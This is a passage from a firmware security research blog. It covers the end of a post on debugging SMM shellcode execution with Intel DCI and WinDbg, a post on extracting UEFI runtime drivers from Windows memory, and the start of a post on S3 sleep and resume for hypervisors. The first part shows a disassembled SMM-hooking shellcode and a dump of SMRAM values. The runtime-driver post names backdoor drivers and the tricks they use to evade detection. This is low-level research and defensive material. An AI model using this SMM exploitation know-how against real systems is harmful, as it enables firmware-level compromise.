/>r14=fffff8064d8652f8 r15=ffff808cd68ff000<br />...</span><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;"><div>0: kd> uf <span style="background-color: #fff2cc;">07070707</span></div><div>00000000`07070707 90 nop</div><div>00000000`07070708 90 nop</div><div>00000000`07070709 90 nop</div><div>00000000`0707070a 90 nop</div><div>00000000`0707070b 90 nop</div><div>00000000`0707070c 90 nop</div><div>00000000`0707070d 90 nop</div><div>00000000`0707070e 90 nop</div><div>00000000`0707070f 90 nop</div><div>00000000`07070710 4c89442418 mov qword ptr [rsp+18h],r8</div><div>00000000`07070715 4889542410 mov qword ptr [rsp+10h],rdx</div><div>00000000`0707071a 48894c2408 mov qword ptr [rsp+8],rcx</div><div>00000000`0707071f 4883ec28 sub rsp,28h</div><div>00000000`07070723 
48c744240800000000 mov qword ptr [rsp+8],0</div><div>00000000`0707072c b99e000000 mov ecx,9Eh</div><div>00000000`07070731 0f32 rdmsr</div></span><div><span style="font-family: Consolas; font-size: x-small;"><br /><span>0: kd> bp 0`07070707 </span><br /><span>0: kd> g</span><br /><span>Breakpoint 0 hit</span><br /><span style="background-color: #fff2cc;">0038:00000000`07070707 90 nop</span></span></div><div><span style="background-color: white; font-family: courier;">----</span></div><p style="text-align: left;">🎉 As expected, the target breaks into the debugger at 0x07070707. Once the shellcode has executed, its output stored at address 0x0 can be inspected.</p><p style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpoWk-JmCN9-kqjZvf2OLsVXZu7WDRHyHniaQxOh1DfmASyW5vl-N_8lYUnzG0PBsQf-C88NKZqtWrduRTqOc-gHHejWE5ameI1PEVrmxV87S3ORIQXeQBKseTon2ZRLCe7PqPLJIEZ8s/s1437/ok.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="482" data-original-width="1437" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpoWk-JmCN9-kqjZvf2OLsVXZu7WDRHyHniaQxOh1DfmASyW5vl-N_8lYUnzG0PBsQf-C88NKZqtWrduRTqOc-gHHejWE5ameI1PEVrmxV87S3ORIQXeQBKseTon2ZRLCe7PqPLJIEZ8s/w640-h214/ok.png" width="640" /></a></p><div><span style="background-color: white;"><span style="font-family: courier;">----</span></span></div><div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> dx *(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0</span></div><div><span style="font-family: Consolas; font-size: x-small;">*(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0 [Type: HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x000] Untouched : 0x1588748418 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x008] Smbase : 0x887cb000 [Type: unsigned 
__int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x010] SmmFeatureControl : 0x1 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x018] SmmMcaCap : 0xc00000000000000 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x020] Eptp : 0x0 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x028] HvPatchedAddress : 0x0 [Type: unsigned __int64]</span></div></div><div><span style="background-color: white;"><span style="font-family: courier;">----</span></span><br /></div><div><p style="text-align: left;">Hopefully, you find the combination of DCI and Windbg interesting.</p><h2 style="text-align: left;">Resources </h2><h3 style="text-align: left;">Tips for general debugging with DCI</h3></div><p style="text-align: left;"></p><ul style="text-align: left;"><li>Make the target system single core with bcdedit. I found debugging a multi-core configuration to be unusably unstable. </li><li>Fully disable Hyper-V on the target before debugging. Hyper-V will crash the system with a synthetic watchdog bug check, even if VBS is disabled. </li><li>DCI offers break-on-VM-exit/entry, but I could never make it work. Do not waste time on it, but let me know if it works for you.</li></ul><h3 style="text-align: left;">Tips and references for reverse engineering SMM with DCI</h3><div><ul><li>SMI is handled by the following functions in EDK2. 
Your system can very well be the same.</li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/X64/SmiEntry.nasm#L89">_SmiEntryPoint (SmiEntry.nasm)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/MpService.c#L1562">SmiRendezvous (MpService.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/MpService.c#L454">BSPHandler (MpService.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmCore.c#L645">SmmEntryPoint (PiSmmCore.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/Smi.c#L97">SmiManage (Smi.c)</a></li></ul></ul></ul></ul></ul></ul></div><div><ul style="text-align: left;"><li>Neither Windbg nor Intel System Debugger correctly displays 16-bit mode code at the beginning of SMM. Just continue single stepping until around offset 0x90.<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUFefVA-T1INcThIONk-BDLCVZO-EFnFJmn1_1hHwzxFVQh2O9QsaufjuHhGaZvaEykBmIXkLe4K_xyI4bg2ZpLAMzTtiSU9BNAbOWxFGxAz0WDbvry3KP-uVuEZtlP-zdacwWMdU2cQk/s2048/brokwn_asm.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1041" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUFefVA-T1INcThIONk-BDLCVZO-EFnFJmn1_1hHwzxFVQh2O9QsaufjuHhGaZvaEykBmIXkLe4K_xyI4bg2ZpLAMzTtiSU9BNAbOWxFGxAz0WDbvry3KP-uVuEZtlP-zdacwWMdU2cQk/s320/brokwn_asm.png" width="320" /></a></div></li></ul><ul style="text-align: left;"><li><a href="https://github.com/h2hconference/2017/blob/master/H2HC%20-%20Ermolov%20&%20Zakirov%20-%20%20UEFI%20BIOS%20Holes.pptx">UEFI BIOS holes. So Much Magic. 
Don’t Come Inside</a> (Slides)</li><li><a href="https://www.slideshare.net/phdays/tapping-into-the-core">Tapping into the core</a> (Slides)</li><li><a href="https://github.com/eclypsium/Publications/blob/master/2018/DEFCON26/DC26_UEFI_EXPLOITATION_MASSES_FINAL.pdf">UEFI Exploitation For The Masses</a> (Slides)</li><li><a href="https://eclypsium.com/2018/07/23/evil-maid-firmware-attacks-using-usb-debug/">“EVIL MAID” FIRMWARE ATTACKS USING USB DEBUG</a></li></ul><h4 style="text-align: left;">Others</h4><ul style="text-align: left;"><li><a href="https://www.asset-intertech.com/resources/blog/2020/05/open-source-firmware-explorations-using-dci-on-the-aaeon-up-squared-board/">Open Source Firmware explorations using DCI on the AAEON UP Squared board</a> </li><ul><li>Enabling DCI on UP Squared. The most detailed step-by-step instructions for the device. Excellent blog. </li></ul><li><a href="http://advdbg.org/gdk/download/20200606-GDC_3_DbgWindows.pdf">使用DCI EXDI会话调试Windows内核</a> (Chinese)</li><ul><li>Reverse engineering Windows using DCI and Windbg</li></ul><li><a href="http://blog.cr4.sh/2016/10/exploiting-ami-aptio-firmware.html">Exploiting AMI Aptio firmware on example of Intel NUC</a></li><ul><li>About the same vulnerability and SMRAM forensics </li></ul><li>C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\sdk\samples\exdi</li><ul><li>for EXDI. 
This includes a Windbg-gdb-VMware bridge called ExdiGdbSrvSample.</li></ul></ul></div><h2 style="text-align: left;">Acknowledgement </h2><div><ul style="text-align: left;"><li>Researchers who published their work on DCI and SMM, in particular Dmytro Oleksiuk (<a href="https://twitter.com/d_olex">@d_olex</a>) and Mark Ermolov (<a href="https://twitter.com/_markel___">@_markel___</a>)</li></ul></div></div></div></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-61799350053618519712020-12-24T08:34:00.002-08:002020-12-24T08:52:52.718-08:00Experiment in extracting runtime drivers on Windows<p>This post explains the concept of UEFI runtime drivers, how they interact with the OS, and an experimental attempt to extract them.</p><p>Here is a quick takeaway from this article. </p><p></p><ul style="text-align: left;"><li>UEFI runtime drivers are parts of firmware that run with ring-0 privilege before the OS starts.</li><li>They provide interfaces to some firmware-dependent features, called runtime services, to the OS. 
</li><li>Windows saves the addresses of those runtime services into HalEfiRuntimeServicesBlock.</li><li>The base addresses of runtime drivers can be located from the contents of HalEfiRuntimeServicesBlock, but it is difficult to find HalEfiRuntimeServicesBlock and the base addresses safely.</li><li>Dumping runtime drivers is useful for diagnosing issues with them, but the HalEfiRuntimeServicesBlock-based approach is fundamentally limited to drivers that implement runtime services.</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmI6z9ddohFMWecaeq8ne-PEdwHrc8ThPAOkBMSKfypAajLaW2XijGVJ4oQjZSqqgv_1CJkFi74OBQhmluNoETv7f4MBKTQofsbIS04XdkU0C_wN7FTnHf2ryJtAxIOy7RtIwBRZJJrHc/s2048/IMG-4907.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="2048" data-original-width="1536" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmI6z9ddohFMWecaeq8ne-PEdwHrc8ThPAOkBMSKfypAajLaW2XijGVJ4oQjZSqqgv_1CJkFi74OBQhmluNoETv7f4MBKTQofsbIS04XdkU0C_wN7FTnHf2ryJtAxIOy7RtIwBRZJJrHc/s320/IMG-4907.JPG" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Happy holidays?</td></tr></tbody></table><h2 style="text-align: left;"><br />What are UEFI runtime drivers?</h2><div>Retail x86_64 PCs these days have UEFI-based system firmware, and such firmware must implement some modules that reside in memory from system startup to shutdown. Those modules are called UEFI "runtime drivers" and are meant to provide interfaces to certain firmware-implemented services for an operating system (OS), as specified by the UEFI specification.</div><div><br /></div><div>For example, UEFI defines ResetSystem() as one such interface and requires OEMs to ship firmware containing a runtime driver that implements it. 
Taking my ASUS laptop as an example, ResetSystem() is implemented in a runtime driver called SBRun. </div><div><br /></div><div>Those interfaces are called "runtime services" and defined for 14 services. One can find the C-representation of their definitions in <a href="https://github.com/tianocore/edk2/blob/f1567720b13a578ffa54716119f826df622babcd/MdePkg/Include/Uefi/UefiSpec.h#L1818">EDK2</a>.</div><div><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #6a9955;">///</span></div><div><span style="color: #6a9955;">/// EFI Runtime Services Table.</span></div><div><span style="color: #6a9955;">///</span></div><div><span style="color: #569cd6;">typedef</span> <span style="color: #569cd6;">struct</span> {</div><div><span style="color: #6a9955;"> ///</span></div><div><span style="color: #6a9955;"> /// The table header for the EFI Runtime Services Table.</span></div><div><span style="color: #6a9955;"> ///</span></div><div> <span style="color: #4ec9b0;">EFI_TABLE_HEADER</span> <span style="color: #9cdcfe;">Hdr</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Time Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_TIME</span> <span style="color: #9cdcfe;">GetTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_TIME</span> <span style="color: #9cdcfe;">SetTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_GET_WAKEUP_TIME</span> <span style="color: #9cdcfe;">GetWakeupTime</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_WAKEUP_TIME</span> <span style="color: #9cdcfe;">SetWakeupTime</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Virtual Memory Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span 
style="color: #4ec9b0;">EFI_SET_VIRTUAL_ADDRESS_MAP</span> <span style="color: #9cdcfe;">SetVirtualAddressMap</span>;</div><div> <span style="color: #4ec9b0;">EFI_CONVERT_POINTER</span> <span style="color: #9cdcfe;">ConvertPointer</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Variable Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_VARIABLE</span> <span style="color: #9cdcfe;">GetVariable</span>;</div><div> <span style="color: #4ec9b0;">EFI_GET_NEXT_VARIABLE_NAME</span> <span style="color: #9cdcfe;">GetNextVariableName</span>;</div><div> <span style="color: #4ec9b0;">EFI_SET_VARIABLE</span> <span style="color: #9cdcfe;">SetVariable</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Miscellaneous Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_GET_NEXT_HIGH_MONO_COUNT</span> <span style="color: #9cdcfe;">GetNextHighMonotonicCount</span>;</div><div> <span style="color: #4ec9b0;">EFI_RESET_SYSTEM</span> <span style="color: #9cdcfe;">ResetSystem</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // UEFI 2.0 Capsule Services</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_UPDATE_CAPSULE</span> <span style="color: #9cdcfe;">UpdateCapsule</span>;</div><div> <span style="color: #4ec9b0;">EFI_QUERY_CAPSULE_CAPABILITIES</span> <span style="color: #9cdcfe;">QueryCapsuleCapabilities</span>;</div><br /><div><span style="color: #6a9955;"> //</span></div><div><span style="color: #6a9955;"> // Miscellaneous UEFI 2.0 Service</span></div><div><span style="color: #6a9955;"> //</span></div><div> <span style="color: #4ec9b0;">EFI_QUERY_VARIABLE_INFO</span> <span style="color: #9cdcfe;">QueryVariableInfo</span>;</div><div>} <span 
style="color: #4ec9b0;">EFI_RUNTIME_SERVICES</span>;</div></div></div><div><br /></div><h2 style="text-align: left;">Why do we care? </h2><div>Runtime drivers have some interesting characteristics:</div><div><ul style="text-align: left;"><li>They start before the OS is loaded and can influence the boot process</li><li>They run with ring-0 privilege</li><li>They are called during normal OS execution through the runtime services</li><li>They are not listed by any widely known monitoring tools or debuggers (unlike device drivers) on Windows</li><li>They can be developed by anyone and be loaded as long as Secure Boot is disabled</li><li>They may not exist as files in storage that is accessible from the OS </li></ul>Because of the lack of visibility into them and of access to their files, diagnosing issues with them can be more challenging than diagnosing issues with OS-based kernel modules. For example, to reverse engineer runtime driver code, you first have to find the runtime drivers in memory and extract them to a file, instead of grabbing a file on the disk.</div><div><br /></div><div>The other reason is that runtime drivers have gained popularity in the reverse engineering community and are used more and more widely in a way that breaks the standard OS/system integrity. For example, the owner of the system may install a third-party runtime driver that overrides the runtime services provided by OEM firmware, to have a "backdoor" for reverse engineering. <a href="https://github.com/Mattiwatti/EfiGuard">EfiGuard</a> and <a href="https://github.com/SamuelTulach/efi-memory">efi-memory</a> are examples of those. While that is the owner's very intention, some software may still want to detect this and be aware that system integrity might have been tampered with. </div><div><br /></div><h2 style="text-align: left;">How can we find runtime drivers on Windows?</h2><div>There is no documented interface to locate any runtime drivers in the Windows kernel, unfortunately. 
However, there are a few implementation details that can be used for this, for example:</div><div><ul style="text-align: left;"><li>The addresses of some runtime services are stored in HalEfiRuntimeServicesBlock</li><li>There is an EFI_RUNTIME_SERVICES global variable, which contains pointers to the runtime services as seen above, has <a href="https://github.com/tianocore/edk2/blob/edk2-stable202011/MdePkg/Include/Uefi/UefiSpec.h#L1814">a distinctive RUNTSERV signature</a>, and is memory resident</li><li>Runtime drivers are also memory resident, mapped in a certain contiguous physical and virtual memory range, and have the DOS header at 4KB aligned addresses</li><li>Physical memory addresses backing runtime drivers are outside the ranges that Windows manages</li></ul><div>Based on those facts, one may scan for the DOS header in physical or virtual memory and attempt to find all runtime drivers. </div><div><br /></div><div>The other, more limited (details later) but arguably easier and safer way is to refer to HalEfiRuntimeServicesBlock. HalEfiRuntimeServicesBlock is a Windows-defined structure made up of copies of a handful of runtime service addresses [<a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">ref</a>], as shown below. 
</div></div><div><br /></div><div><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div><span style="color: #569cd6;">typedef</span> <span style="color: #569cd6;">struct</span> <span style="color: #4ec9b0;">_HAL_RUNTIME_SERVICES_BLOCK</span></div><div>{</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetTime</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">SetTime</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">ResetSystem</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetVariable</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">GetNextVariableName</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">SetVariable</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">UpdateCapsule</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">QueryCapsuleCapabilities</span>;</div><div> <span style="color: #569cd6;">void</span>* <span style="color: #9cdcfe;">QueryVariableInfo</span>;</div><div>} <span style="color: #4ec9b0;">HAL_RUNTIME_SERVICES_BLOCK</span>;</div></div></div><div><br /></div><div>Windows initializes this structure on its startup and uses it to invoke runtime services (as opposed to directly using the EFI_RUNTIME_SERVICES structure). By locating HalEfiRuntimeServicesBlock, one can find runtime services' addresses and runtime drivers implementing them. </div><div><br /></div><h2 style="text-align: left;">PoC and challenges </h2><div>I authored the tool implementing this idea, named <a href="https://github.com/tandasat/kraft_dinner">kraft_dinner</a>. 
More details can be found in the source code; here are some notable discoveries with this approach.</div><div><ul style="text-align: left;"><li>HalEfiRuntimeServicesBlock can be found with HalQuerySystemInformation() only up to 19H2. One has to get creative for newer versions.</li><li>The physical memory address range backing runtime drivers is not known to Windows and not reported by MmGetPhysicalMemoryRanges(). This can be used to test a probable runtime driver address. </li><li>MmCopyMemory() never succeeds in reading memory that backs runtime drivers, regardless of whether virtual or physical memory is specified. This makes implementing a safe search operation harder.</li></ul><h2 style="text-align: left;">Limitations</h2></div><div>While the HalEfiRuntimeServicesBlock approach works reasonably well, it has some fundamental limitations.</div><div><br /></div><div>Firstly, runtime drivers that do not implement runtime services are not found. Such runtime drivers do not have any formally defined way to directly influence Windows and system integrity, but may still hook (patch) other code to implement a backdoor instead. <a href="https://github.com/btbd/umap">umap</a> and <a href="https://githacks.org/_xeroxz/voyager">voyager</a> are examples of such hacking drivers. A memory scanning-based approach would address this issue. </div><div><br /></div><div>Secondly, runtime drivers can hide from this approach easily by writing trampoline code at the beginning of the original runtime service, instead of replacing the pointer in EFI_RUNTIME_SERVICES, or by nullifying the PE header. These may be mitigated with more intelligent analysis and dumping, but they are easy countermeasures against scanning. </div><div><br /></div><div>Thirdly, as a general challenge with memory analysis, classifying files dumped from memory is not straightforward. Because memory contents can vary slightly between boots due to relocation (code patches), hash values change each time. 
Fuzzy hashing such as <a href="https://ssdeep-project.github.io/ssdeep/index.html">ssdeep</a> is required to classify dump files and build a useful database. Also, a dump file does not contain the driver's name and GUID as found in the actual firmware.</div><div><br /></div><div>Finally, this is Windows-specific and hacky. It depends heavily on Windows implementation details, which may break soon. While the PoC worked fine on multiple devices, I would not be comfortable deploying this logic to millions of systems. </div><div><br /></div><h2 style="text-align: left;">So why did I do this?</h2><div>I encountered a bug in one of the OEM runtime drivers and thought I would build a quick tool, but in Rust :) </div><div><br /></div><h2 style="text-align: left;">References</h2><div><ul style="text-align: left;"><li><a href="https://github.com/tianocore/edk2">EDK2</a></li><li><a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">Getting Physical with USB Type-C, Windows 10 RAM Forensics and UEFI Attacks</a></li><li><a href="https://github.com/tandasat/kraft_dinner">kraft_dinner</a></li><li><a href="https://github.com/Mattiwatti/EfiGuard">EfiGuard</a> </li><li><a href="https://github.com/SamuelTulach/efi-memory">efi-memory</a></li><li><a href="https://github.com/btbd/umap">umap</a></li><li><a href="https://githacks.org/_xeroxz/voyager">voyager</a></li><li><a href="https://ssdeep-project.github.io/ssdeep/index.html">ssdeep</a></li></ul></div><p></p>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-79887785807042221992020-11-16T07:20:00.008-08:002020-11-25T19:36:13.191-08:00S3 Sleep, Resume and Handling Them with Type-1 Hypervisor This post explains how the system enters and resumes from S3 (Sleep) on a modern x86-64 system, by reviewing specifications and the implementation of 
Windows as an example. This post also outlines challenges with S3 for type-1 hypervisors and how to work around them.<div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyW2wq5HppBPnb86dcfewe8R5lOXAjYVZ5Ekh2wIkt-fqIQmDQg41YNvK25HNPP65L7SBnhNqZvnS6rt79vhIPZniSkE6_g0kzARDlrlf37S1XJFHGJ2WjCTEJuzKplA3ZNWeFKDpt2Xw/s2016/IMG_6749.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1512" data-original-width="2016" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyW2wq5HppBPnb86dcfewe8R5lOXAjYVZ5Ekh2wIkt-fqIQmDQg41YNvK25HNPP65L7SBnhNqZvnS6rt79vhIPZniSkE6_g0kzARDlrlf37S1XJFHGJ2WjCTEJuzKplA3ZNWeFKDpt2Xw/s320/IMG_6749.jpg" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">TeaTea in the S3 state<br /><br /></td></tr></tbody></table><h2 style="text-align: left;">Why S3 is Interesting</h2><div>On normal system startup, UEFI-based system firmware goes through four execution phases before starting the OS. Those phases include Driver eXecution Environment (DXE), Boot Device Selection (BDS), and <span style="white-space: pre;">Transient System Load (TSL)</span>, where system configurations are set and 3rd party firmware modules may be executed. On the S3 resume boot path, on the other hand, those phases are skipped for faster start-up. </div><div><div><br /></div>This has significant security implications because the S3 resume boot path needs to reapply the same security configurations as those made during the normal boot path, using entirely different code. Failure to do so securely leads to vulnerabilities, for example, unauthorized modification of a system firmware image if a firmware write-protection bit is not reapplied during resume. 
</div><div><br /></div><div>Also, for a type-1 hypervisor that is loaded during the <span style="white-space: pre;">TSL</span> phase, the lack of that phase means it is unable to get loaded on resume. Since the processors were shut down on S3, processor-based virtualization features such as Intel VT-x stop working after resume even though the hypervisor module remains mapped in memory. This needs to be handled. </div><div><br /></div><h2 style="text-align: left;">High-Level Flow</h2>Before diving into details, let us review a high-level flow of S3 sleep and resume. The following are the highlights.</div><div><ol style="text-align: left;"><li>Setting certain bits in the registers called Power Management (PM) 1 Control registers, or PM1a_CNT_BLK / PM1b_CNT_BLK, puts the system into the S3 state.</li><li>During the next system start-up, system firmware detects that the shutdown was because of S3 and executes the S3 resume boot path, instead of the normal boot path. </li><li>System firmware executes a collection of commands, called boot scripts, and the code pointed to by the Firmware Waking Vector in the ACPI table. The latter is called the OS waking vector and is set up by the OS prior to entering S3. </li><li>The waking vector resumes execution of the OS.</li></ol><div><div><h3 style="text-align: left;">Entering S3</h3></div></div><div>The platform enters S3 when software sets the SLP_EN bit to 1 and the SLP_TYP bits to 5 (0b101) in the PM1 control registers. The ACPI specification states that setting SLP_EN triggers the state transition. 
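<div><br /></div><div>As a minimal sketch, the value written to the PM1 control register could be composed as follows. The bit positions (SLP_TYPx in bits 10-12, SLP_EN in bit 13) are from the ACPI specification. The helper name <code>pm1_cnt_sleep_value</code> is hypothetical, and the S3 value of 5 is an assumption that holds for the Intel platform discussed in this post; other platforms report their own SLP_TYP value through ACPI.</div>

```c
#include <stdint.h>

/* Bit positions in the PM1 control register, per the ACPI specification. */
#define PM1_CNT_SLP_TYP_SHIFT 10u                            /* SLP_TYPx: bits 10-12 */
#define PM1_CNT_SLP_TYP_MASK  (0x7u << PM1_CNT_SLP_TYP_SHIFT)
#define PM1_CNT_SLP_EN        (1u << 13)                     /* SLP_EN: bit 13 */

/* Assumption: 5 (0b101) selects S3, as on the Intel platform in this post. */
#define SLP_TYP_S3 5u

/*
 * Hypothetical helper: given the current register contents and the desired
 * sleep type, returns the value to write to PM1a_CNT / PM1b_CNT.
 * Bits other than SLP_TYPx and SLP_EN are preserved.
 */
static uint16_t pm1_cnt_sleep_value(uint16_t current, uint16_t slp_typ)
{
    uint32_t value = current & ~PM1_CNT_SLP_TYP_MASK;        /* clear old SLP_TYPx */
    value |= ((uint32_t)slp_typ << PM1_CNT_SLP_TYP_SHIFT) & PM1_CNT_SLP_TYP_MASK;
    value |= PM1_CNT_SLP_EN;                                 /* trigger the transition */
    return (uint16_t)value;
}
```

<div>For example, with only bit 0 set in the current register value, <code>pm1_cnt_sleep_value(0x0001, SLP_TYP_S3)</code> yields 0x3401. Actually writing the value requires a privileged port IO write, which is left out of this sketch.</div>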
</div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUTMcKpM6tEJ9TZEfKTKzomVBAy9BQBT8L0vwnDQLCNl08Me7Y8u-IbLRypbi8zaHNCs2WO1N7ECpuBPiFBmVtSQB0GBVRAtBLR_XU_rytyRXiDPleDGSmp-zGfFUv-maiJlYXXPaTeY/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="619" data-original-width="2171" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUTMcKpM6tEJ9TZEfKTKzomVBAy9BQBT8L0vwnDQLCNl08Me7Y8u-IbLRypbi8zaHNCs2WO1N7ECpuBPiFBmVtSQB0GBVRAtBLR_XU_rytyRXiDPleDGSmp-zGfFUv-maiJlYXXPaTeY/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Table 4.13: PM1 Control Registers Fixed Hardware Feature Control, from the ACPI spec</span></td></tr></tbody></table>The explanation of the SLP_TYP bits in the table is not crystal clear, but it becomes more obvious with the specification of the Intel platform. 
The below is an excerpt from the table under 4.2.2 Power Management 1 Control (PM1_CNT) in one of the hardware models that implement ACPI.</div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkZxbT_jzEvw2hPnNDYmJqZi1BCGlvK4rU31Lazyk1oZDn2wHmkfntuLMTk2MMj0rU5-PY2H1PkPoIuG7zy4OU7rBAZQpYBTakmjuXZ4MNExQtqeinAfotaXAiTQ3hxY45g5eEHnb907g/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="441" data-original-width="1834" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkZxbT_jzEvw2hPnNDYmJqZi1BCGlvK4rU31Lazyk1oZDn2wHmkfntuLMTk2MMj0rU5-PY2H1PkPoIuG7zy4OU7rBAZQpYBTakmjuXZ4MNExQtqeinAfotaXAiTQ3hxY45g5eEHnb907g/" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;"> From Intel 495 Series Chipset Family On-Package Platform Controller Hub volume 2</span></td></tr></tbody></table><br /><div>Then, where are those registers? The ACPI does not define it but does define the way to locate them. Under 4.8.3 PM1 Control Registers, it states that</div><div><blockquote>Each register block has a unique 32-bit pointer in the Fixed ACPI Table (FADT) to allow the PM1 event bits to be partitioned between two chips.</blockquote></div><div>The below are excerpts of the FADT format, which contains multiple fields indicating where the registers are. 
